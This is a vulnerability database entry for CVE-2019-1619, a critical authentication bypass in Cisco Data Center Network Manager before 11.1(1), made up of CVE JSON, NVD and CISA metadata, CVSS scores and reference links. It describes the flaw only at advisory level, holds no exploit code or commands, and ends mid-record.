cvelistv5 - cve-2019-1619

CVE-2019-1619 (GCVE-0-2019-1619)

Vulnerability from cvelistv5 – Published: 2019-06-27 03:00 – Updated: 2024-11-19 19:04

Summary

Severity ?

9.8 (Critical)


                        
                          CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-284

Assigner

cisco

References

URL

Tags

	https://tools.cisco.com/security/center/content/C…	vendor-advisoryx_refsource_CISCO
	http://www.securityfocus.com/bid/108902	vdb-entryx_refsource_BID
	https://seclists.org/bugtraq/2019/Jul/11	mailing-listx_refsource_BUGTRAQ
	http://packetstormsecurity.com/files/153546/Cisco…	x_refsource_MISC
	http://seclists.org/fulldisclosure/2019/Jul/7	mailing-listx_refsource_FULLDISC
	http://packetstormsecurity.com/files/154304/Cisco…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	Cisco	Cisco Data Center Network Manager	Affected: unspecified , < 11.1(1) (custom)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-04T18:20:28.364Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "20190626 Cisco Data Center Network Manager Authentication Bypass Vulnerability",
            "tags": [
              "vendor-advisory",
              "x_refsource_CISCO",
              "x_transferred"
            ],
            "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-bypass"
          },
          {
            "name": "108902",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/108902"
          },
          {
            "name": "20190708 Cisco Data Center Manager multiple vulns; RCE as root",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "https://seclists.org/bugtraq/2019/Jul/11"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/153546/Cisco-Data-Center-Network-Manager-11.1-1-Remote-Code-Execution.html"
          },
          {
            "name": "20190709 Cisco Data Center Manager multiple vulns; RCE as root",
            "tags": [
              "mailing-list",
              "x_refsource_FULLDISC",
              "x_transferred"
            ],
            "url": "http://seclists.org/fulldisclosure/2019/Jul/7"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/154304/Cisco-Data-Center-Network-Manager-Unauthenticated-Remote-Code-Execution.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2019-1619",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-11-19T17:21:18.561910Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-11-19T19:04:34.884Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Cisco Data Center Network Manager",
          "vendor": "Cisco",
          "versions": [
            {
              "lessThan": "11.1(1)",
              "status": "affected",
              "version": "unspecified",
              "versionType": "custom"
            }
          ]
        }
      ],
      "datePublic": "2019-06-26T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "A vulnerability in the web-based management interface of Cisco Data Center Network Manager (DCNM) could allow an unauthenticated, remote attacker to bypass authentication and execute arbitrary actions with administrative privileges on an affected device. The vulnerability is due to improper session management on affected DCNM software. An attacker could exploit this vulnerability by sending a crafted HTTP request to the affected device. A successful exploit could allow the attacker to gain administrative access on the affected device."
        }
      ],
      "exploits": [
        {
          "lang": "en",
          "value": "The Cisco Product Security Incident Response Team (PSIRT) is not aware of any malicious use of the vulnerability that is described in this advisory."
        }
      ],
      "metrics": [
        {
          "cvssV3_0": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-284",
              "description": "CWE-284",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2019-09-02T20:06:05",
        "orgId": "d1c1063e-7a18-46af-9102-31f8928bc633",
        "shortName": "cisco"
      },
      "references": [
        {
          "name": "20190626 Cisco Data Center Network Manager Authentication Bypass Vulnerability",
          "tags": [
            "vendor-advisory",
            "x_refsource_CISCO"
          ],
          "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-bypass"
        },
        {
          "name": "108902",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/108902"
        },
        {
          "name": "20190708 Cisco Data Center Manager multiple vulns; RCE as root",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "https://seclists.org/bugtraq/2019/Jul/11"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://packetstormsecurity.com/files/153546/Cisco-Data-Center-Network-Manager-11.1-1-Remote-Code-Execution.html"
        },
        {
          "name": "20190709 Cisco Data Center Manager multiple vulns; RCE as root",
          "tags": [
            "mailing-list",
            "x_refsource_FULLDISC"
          ],
          "url": "http://seclists.org/fulldisclosure/2019/Jul/7"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://packetstormsecurity.com/files/154304/Cisco-Data-Center-Network-Manager-Unauthenticated-Remote-Code-Execution.html"
        }
      ],
      "source": {
        "advisory": "cisco-sa-20190626-dcnm-bypass",
        "defect": [
          [
            "CSCvo64641"
          ]
        ],
        "discovery": "INTERNAL"
      },
      "title": "Cisco Data Center Network Manager Authentication Bypass Vulnerability",
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "psirt@cisco.com",
          "DATE_PUBLIC": "2019-06-26T16:00:00-0700",
          "ID": "CVE-2019-1619",
          "STATE": "PUBLIC",
          "TITLE": "Cisco Data Center Network Manager Authentication Bypass Vulnerability"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "Cisco Data Center Network Manager",
                      "version": {
                        "version_data": [
                          {
                            "affected": "\u003c",
                            "version_affected": "\u003c",
                            "version_value": "11.1(1)"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "Cisco"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "A vulnerability in the web-based management interface of Cisco Data Center Network Manager (DCNM) could allow an unauthenticated, remote attacker to bypass authentication and execute arbitrary actions with administrative privileges on an affected device. The vulnerability is due to improper session management on affected DCNM software. An attacker could exploit this vulnerability by sending a crafted HTTP request to the affected device. A successful exploit could allow the attacker to gain administrative access on the affected device."
            }
          ]
        },
        "exploit": [
          {
            "lang": "en",
            "value": "The Cisco Product Security Incident Response Team (PSIRT) is not aware of any malicious use of the vulnerability that is described in this advisory."
          }
        ],
        "impact": {
          "cvss": {
            "baseScore": "9.8",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "CWE-284"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "20190626 Cisco Data Center Network Manager Authentication Bypass Vulnerability",
              "refsource": "CISCO",
              "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-bypass"
            },
            {
              "name": "108902",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/108902"
            },
            {
              "name": "20190708 Cisco Data Center Manager multiple vulns; RCE as root",
              "refsource": "BUGTRAQ",
              "url": "https://seclists.org/bugtraq/2019/Jul/11"
            },
            {
              "name": "http://packetstormsecurity.com/files/153546/Cisco-Data-Center-Network-Manager-11.1-1-Remote-Code-Execution.html",
              "refsource": "MISC",
              "url": "http://packetstormsecurity.com/files/153546/Cisco-Data-Center-Network-Manager-11.1-1-Remote-Code-Execution.html"
            },
            {
              "name": "20190709 Cisco Data Center Manager multiple vulns; RCE as root",
              "refsource": "FULLDISC",
              "url": "http://seclists.org/fulldisclosure/2019/Jul/7"
            },
            {
              "name": "http://packetstormsecurity.com/files/154304/Cisco-Data-Center-Network-Manager-Unauthenticated-Remote-Code-Execution.html",
              "refsource": "MISC",
              "url": "http://packetstormsecurity.com/files/154304/Cisco-Data-Center-Network-Manager-Unauthenticated-Remote-Code-Execution.html"
            }
          ]
        },
        "source": {
          "advisory": "cisco-sa-20190626-dcnm-bypass",
          "defect": [
            [
              "CSCvo64641"
            ]
          ],
          "discovery": "INTERNAL"
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "d1c1063e-7a18-46af-9102-31f8928bc633",
    "assignerShortName": "cisco",
    "cveId": "CVE-2019-1619",
    "datePublished": "2019-06-27T03:00:29.251400Z",
    "dateReserved": "2018-12-06T00:00:00",
    "dateUpdated": "2024-11-19T19:04:34.884Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "fkie_nvd": {
      "configurations": "[{\"nodes\": [{\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:cisco:data_center_network_manager:10.4\\\\(2\\\\):*:*:*:*:*:*:*\", \"matchCriteriaId\": \"322E195C-0744-4D59-970C-75B731A4D4D9\"}]}]}]",
      "descriptions": "[{\"lang\": \"en\", \"value\": \"A vulnerability in the web-based management interface of Cisco Data Center Network Manager (DCNM) could allow an unauthenticated, remote attacker to bypass authentication and execute arbitrary actions with administrative privileges on an affected device. The vulnerability is due to improper session management on affected DCNM software. An attacker could exploit this vulnerability by sending a crafted HTTP request to the affected device. A successful exploit could allow the attacker to gain administrative access on the affected device.\"}, {\"lang\": \"es\", \"value\": \"Una vulnerabilidad en el interfaz de administraci\\u00f3n Web- based de Cisco Data Center Network Manager (DCNM) podr\\u00eda permitir a un atacante remoto sin autorizaci\\u00f3n eludir la identificaci\\u00f3n y ejecutar acciones arbitrarias con privilegios administrativos en el dispositivo afectado. La vulnerabilidad es debido a una sesi\\u00f3n de administraci\\u00f3n incorrecta en el software afectado DCNM. Un atacante podr\\u00eda explotar esta vulnerabilidad enviando una solicitud HTTP dise\\u00f1ada al dispositivo afectado. Una operaci\\u00f3n con \\u00e9xito podr\\u00eda permitir al atacante obtener acceso administrativo en el dispositivo afectado\"}]",
      "id": "CVE-2019-1619",
      "lastModified": "2024-11-21T04:36:56.657",
      "metrics": "{\"cvssMetricV31\": [{\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"cvssData\": {\"version\": \"3.1\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\", \"baseScore\": 9.8, \"baseSeverity\": \"CRITICAL\", \"attackVector\": \"NETWORK\", \"attackComplexity\": \"LOW\", \"privilegesRequired\": \"NONE\", \"userInteraction\": \"NONE\", \"scope\": \"UNCHANGED\", \"confidentialityImpact\": \"HIGH\", \"integrityImpact\": \"HIGH\", \"availabilityImpact\": \"HIGH\"}, \"exploitabilityScore\": 3.9, \"impactScore\": 5.9}], \"cvssMetricV30\": [{\"source\": \"ykramarz@cisco.com\", \"type\": \"Secondary\", \"cvssData\": {\"version\": \"3.0\", \"vectorString\": \"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\", \"baseScore\": 9.8, \"baseSeverity\": \"CRITICAL\", \"attackVector\": \"NETWORK\", \"attackComplexity\": \"LOW\", \"privilegesRequired\": \"NONE\", \"userInteraction\": \"NONE\", \"scope\": \"UNCHANGED\", \"confidentialityImpact\": \"HIGH\", \"integrityImpact\": \"HIGH\", \"availabilityImpact\": \"HIGH\"}, \"exploitabilityScore\": 3.9, \"impactScore\": 5.9}], \"cvssMetricV2\": [{\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"cvssData\": {\"version\": \"2.0\", \"vectorString\": \"AV:N/AC:L/Au:N/C:P/I:P/A:P\", \"baseScore\": 7.5, \"accessVector\": \"NETWORK\", \"accessComplexity\": \"LOW\", \"authentication\": \"NONE\", \"confidentialityImpact\": \"PARTIAL\", \"integrityImpact\": \"PARTIAL\", \"availabilityImpact\": \"PARTIAL\"}, \"baseSeverity\": \"HIGH\", \"exploitabilityScore\": 10.0, \"impactScore\": 6.4, \"acInsufInfo\": false, \"obtainAllPrivilege\": false, \"obtainUserPrivilege\": false, \"obtainOtherPrivilege\": false, \"userInteractionRequired\": false}]}",
      "published": "2019-06-27T03:15:09.433",
      "references": "[{\"url\": \"http://packetstormsecurity.com/files/153546/Cisco-Data-Center-Network-Manager-11.1-1-Remote-Code-Execution.html\", \"source\": \"ykramarz@cisco.com\", \"tags\": [\"Third Party Advisory\", \"VDB Entry\"]}, {\"url\": \"http://packetstormsecurity.com/files/154304/Cisco-Data-Center-Network-Manager-Unauthenticated-Remote-Code-Execution.html\", \"source\": \"ykramarz@cisco.com\", \"tags\": [\"Third Party Advisory\", \"VDB Entry\"]}, {\"url\": \"http://seclists.org/fulldisclosure/2019/Jul/7\", \"source\": \"ykramarz@cisco.com\", \"tags\": [\"Mailing List\", \"Third Party Advisory\"]}, {\"url\": \"http://www.securityfocus.com/bid/108902\", \"source\": \"ykramarz@cisco.com\", \"tags\": [\"Third Party Advisory\", \"VDB Entry\"]}, {\"url\": \"https://seclists.org/bugtraq/2019/Jul/11\", \"source\": \"ykramarz@cisco.com\", \"tags\": [\"Mailing List\", \"Third Party Advisory\"]}, {\"url\": \"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-bypass\", \"source\": \"ykramarz@cisco.com\", \"tags\": [\"Vendor Advisory\"]}, {\"url\": \"http://packetstormsecurity.com/files/153546/Cisco-Data-Center-Network-Manager-11.1-1-Remote-Code-Execution.html\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Third Party Advisory\", \"VDB Entry\"]}, {\"url\": \"http://packetstormsecurity.com/files/154304/Cisco-Data-Center-Network-Manager-Unauthenticated-Remote-Code-Execution.html\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Third Party Advisory\", \"VDB Entry\"]}, {\"url\": \"http://seclists.org/fulldisclosure/2019/Jul/7\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Mailing List\", \"Third Party Advisory\"]}, {\"url\": \"http://www.securityfocus.com/bid/108902\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Third Party Advisory\", \"VDB Entry\"]}, {\"url\": \"https://seclists.org/bugtraq/2019/Jul/11\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Mailing List\", \"Third Party Advisory\"]}, {\"url\": \"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-bypass\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Vendor Advisory\"]}]",
      "sourceIdentifier": "ykramarz@cisco.com",
      "vulnStatus": "Modified",
      "weaknesses": "[{\"source\": \"ykramarz@cisco.com\", \"type\": \"Secondary\", \"description\": [{\"lang\": \"en\", \"value\": \"CWE-284\"}]}, {\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"description\": [{\"lang\": \"en\", \"value\": \"CWE-798\"}]}]"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2019-1619\",\"sourceIdentifier\":\"psirt@cisco.com\",\"published\":\"2019-06-27T03:15:09.433\",\"lastModified\":\"2024-11-21T04:36:56.657\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"A vulnerability in the web-based management interface of Cisco Data Center Network Manager (DCNM) could allow an unauthenticated, remote attacker to bypass authentication and execute arbitrary actions with administrative privileges on an affected device. The vulnerability is due to improper session management on affected DCNM software. An attacker could exploit this vulnerability by sending a crafted HTTP request to the affected device. A successful exploit could allow the attacker to gain administrative access on the affected device.\"},{\"lang\":\"es\",\"value\":\"Una vulnerabilidad en el interfaz de administraci\u00f3n Web- based de Cisco Data Center Network Manager (DCNM) podr\u00eda permitir a un atacante remoto sin autorizaci\u00f3n eludir la identificaci\u00f3n y ejecutar acciones arbitrarias con privilegios administrativos en el dispositivo afectado. La vulnerabilidad es debido a una sesi\u00f3n de administraci\u00f3n incorrecta en el software afectado DCNM. Un atacante podr\u00eda explotar esta vulnerabilidad enviando una solicitud HTTP dise\u00f1ada al dispositivo afectado. Una operaci\u00f3n con \u00e9xito podr\u00eda permitir al atacante obtener acceso administrativo en el dispositivo afectado\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":9.8,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":5.9}],\"cvssMetricV30\":[{\"source\":\"psirt@cisco.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.0\",\"vectorString\":\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":9.8,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":5.9}],\"cvssMetricV2\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"2.0\",\"vectorString\":\"AV:N/AC:L/Au:N/C:P/I:P/A:P\",\"baseScore\":7.5,\"accessVector\":\"NETWORK\",\"accessComplexity\":\"LOW\",\"authentication\":\"NONE\",\"confidentialityImpact\":\"PARTIAL\",\"integrityImpact\":\"PARTIAL\",\"availabilityImpact\":\"PARTIAL\"},\"baseSeverity\":\"HIGH\",\"exploitabilityScore\":10.0,\"impactScore\":6.4,\"acInsufInfo\":false,\"obtainAllPrivilege\":false,\"obtainUserPrivilege\":false,\"obtainOtherPrivilege\":false,\"userInteractionRequired\":false}]},\"weaknesses\":[{\"source\":\"psirt@cisco.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-284\"}]},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-798\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:cisco:data_center_network_manager:10.4\\\\(2\\\\):*:*:*:*:*:*:*\",\"matchCriteriaId\":\"322E195C-0744-4D59-970C-75B731A4D4D9\"}]}]}],\"references\":[{\"url\":\"http://packetstormsecurity.com/files/153546/Cisco-Data-Center-Network-Manager-11.1-1-Remote-Code-Execution.html\",\"source\":\"psirt@cisco.com\",\"tags\":[\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://packetstormsecurity.com/files/154304/Cisco-Data-Center-Network-Manager-Unauthenticated-Remote-Code-Execution.html\",\"source\":\"psirt@cisco.com\",\"tags\":[\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://seclists.org/fulldisclosure/2019/Jul/7\",\"source\":\"psirt@cisco.com\",\"tags\":[\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"http://www.securityfocus.com/bid/108902\",\"source\":\"psirt@cisco.com\",\"tags\":[\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"https://seclists.org/bugtraq/2019/Jul/11\",\"source\":\"psirt@cisco.com\",\"tags\":[\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-bypass\",\"source\":\"psirt@cisco.com\",\"tags\":[\"Vendor Advisory\"]},{\"url\":\"http://packetstormsecurity.com/files/153546/Cisco-Data-Center-Network-Manager-11.1-1-Remote-Code-Execution.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://packetstormsecurity.com/files/154304/Cisco-Data-Center-Network-Manager-Unauthenticated-Remote-Code-Execution.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://seclists.org/fulldisclosure/2019/Jul/7\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"http://www.securityfocus.com/bid/108902\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"https://seclists.org/bugtraq/2019/Jul/11\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-bypass\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CVE Program Container\", \"references\": [{\"url\": \"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-bypass\", \"name\": \"20190626 Cisco Data Center Network Manager Authentication Bypass Vulnerability\", \"tags\": [\"vendor-advisory\", \"x_refsource_CISCO\", \"x_transferred\"]}, {\"url\": \"http://www.securityfocus.com/bid/108902\", \"name\": \"108902\", \"tags\": [\"vdb-entry\", \"x_refsource_BID\", \"x_transferred\"]}, {\"url\": \"https://seclists.org/bugtraq/2019/Jul/11\", \"name\": \"20190708 Cisco Data Center Manager multiple vulns; RCE as root\", \"tags\": [\"mailing-list\", \"x_refsource_BUGTRAQ\", \"x_transferred\"]}, {\"url\": \"http://packetstormsecurity.com/files/153546/Cisco-Data-Center-Network-Manager-11.1-1-Remote-Code-Execution.html\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}, {\"url\": \"http://seclists.org/fulldisclosure/2019/Jul/7\", \"name\": \"20190709 Cisco Data Center Manager multiple vulns; RCE as root\", \"tags\": [\"mailing-list\", \"x_refsource_FULLDISC\", \"x_transferred\"]}, {\"url\": \"http://packetstormsecurity.com/files/154304/Cisco-Data-Center-Network-Manager-Unauthenticated-Remote-Code-Execution.html\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}], \"providerMetadata\": {\"orgId\": \"af854a3a-2127-422b-91ae-364da2661108\", \"shortName\": \"CVE\", \"dateUpdated\": \"2024-08-04T18:20:28.364Z\"}}, {\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2019-1619\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"none\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2024-11-19T17:21:18.561910Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2024-11-19T17:21:53.131Z\"}}], \"cna\": {\"title\": \"Cisco Data Center Network Manager Authentication Bypass Vulnerability\", \"source\": {\"defect\": [[\"CSCvo64641\"]], \"advisory\": \"cisco-sa-20190626-dcnm-bypass\", \"discovery\": \"INTERNAL\"}, \"metrics\": [{\"cvssV3_0\": {\"scope\": \"UNCHANGED\", \"version\": \"3.0\", \"baseScore\": 9.8, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"CRITICAL\", \"vectorString\": \"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"Cisco\", \"product\": \"Cisco Data Center Network Manager\", \"versions\": [{\"status\": \"affected\", \"version\": \"unspecified\", \"lessThan\": \"11.1(1)\", \"versionType\": \"custom\"}]}], \"exploits\": [{\"lang\": \"en\", \"value\": \"The Cisco Product Security Incident Response Team (PSIRT) is not aware of any malicious use of the vulnerability that is described in this advisory.\"}], \"datePublic\": \"2019-06-26T00:00:00\", \"references\": [{\"url\": \"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-bypass\", \"name\": \"20190626 Cisco Data Center Network Manager Authentication Bypass Vulnerability\", \"tags\": [\"vendor-advisory\", \"x_refsource_CISCO\"]}, {\"url\": \"http://www.securityfocus.com/bid/108902\", \"name\": \"108902\", \"tags\": [\"vdb-entry\", \"x_refsource_BID\"]}, {\"url\": \"https://seclists.org/bugtraq/2019/Jul/11\", \"name\": \"20190708 Cisco Data Center Manager multiple vulns; RCE as root\", \"tags\": [\"mailing-list\", \"x_refsource_BUGTRAQ\"]}, {\"url\": \"http://packetstormsecurity.com/files/153546/Cisco-Data-Center-Network-Manager-11.1-1-Remote-Code-Execution.html\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"http://seclists.org/fulldisclosure/2019/Jul/7\", \"name\": \"20190709 Cisco Data Center Manager multiple vulns; RCE as root\", \"tags\": [\"mailing-list\", \"x_refsource_FULLDISC\"]}, {\"url\": \"http://packetstormsecurity.com/files/154304/Cisco-Data-Center-Network-Manager-Unauthenticated-Remote-Code-Execution.html\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"A vulnerability in the web-based management interface of Cisco Data Center Network Manager (DCNM) could allow an unauthenticated, remote attacker to bypass authentication and execute arbitrary actions with administrative privileges on an affected device. The vulnerability is due to improper session management on affected DCNM software. An attacker could exploit this vulnerability by sending a crafted HTTP request to the affected device. A successful exploit could allow the attacker to gain administrative access on the affected device.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-284\", \"description\": \"CWE-284\"}]}], \"providerMetadata\": {\"orgId\": \"d1c1063e-7a18-46af-9102-31f8928bc633\", \"shortName\": \"cisco\", \"dateUpdated\": \"2019-09-02T20:06:05\"}, \"x_legacyV4Record\": {\"impact\": {\"cvss\": {\"version\": \"3.0\", \"baseScore\": \"9.8\", \"vectorString\": \"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\"}}, \"source\": {\"defect\": [[\"CSCvo64641\"]], \"advisory\": \"cisco-sa-20190626-dcnm-bypass\", \"discovery\": \"INTERNAL\"}, \"affects\": {\"vendor\": {\"vendor_data\": [{\"product\": {\"product_data\": [{\"version\": {\"version_data\": [{\"affected\": \"\u003c\", \"version_value\": \"11.1(1)\", \"version_affected\": \"\u003c\"}]}, \"product_name\": \"Cisco Data Center Network Manager\"}]}, \"vendor_name\": \"Cisco\"}]}}, \"exploit\": [{\"lang\": \"en\", \"value\": \"The Cisco Product Security Incident Response Team (PSIRT) is not aware of any malicious use of the vulnerability that is described in this advisory.\"}], \"data_type\": \"CVE\", \"references\": {\"reference_data\": [{\"url\": \"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-bypass\", \"name\": \"20190626 Cisco Data Center Network Manager Authentication Bypass Vulnerability\", \"refsource\": \"CISCO\"}, {\"url\": \"http://www.securityfocus.com/bid/108902\", \"name\": \"108902\", \"refsource\": \"BID\"}, {\"url\": \"https://seclists.org/bugtraq/2019/Jul/11\", \"name\": \"20190708 Cisco Data Center Manager multiple vulns; RCE as root\", \"refsource\": \"BUGTRAQ\"}, {\"url\": \"http://packetstormsecurity.com/files/153546/Cisco-Data-Center-Network-Manager-11.1-1-Remote-Code-Execution.html\", \"name\": \"http://packetstormsecurity.com/files/153546/Cisco-Data-Center-Network-Manager-11.1-1-Remote-Code-Execution.html\", \"refsource\": \"MISC\"}, {\"url\": \"http://seclists.org/fulldisclosure/2019/Jul/7\", \"name\": \"20190709 Cisco Data Center Manager multiple vulns; RCE as root\", \"refsource\": \"FULLDISC\"}, {\"url\": \"http://packetstormsecurity.com/files/154304/Cisco-Data-Center-Network-Manager-Unauthenticated-Remote-Code-Execution.html\", 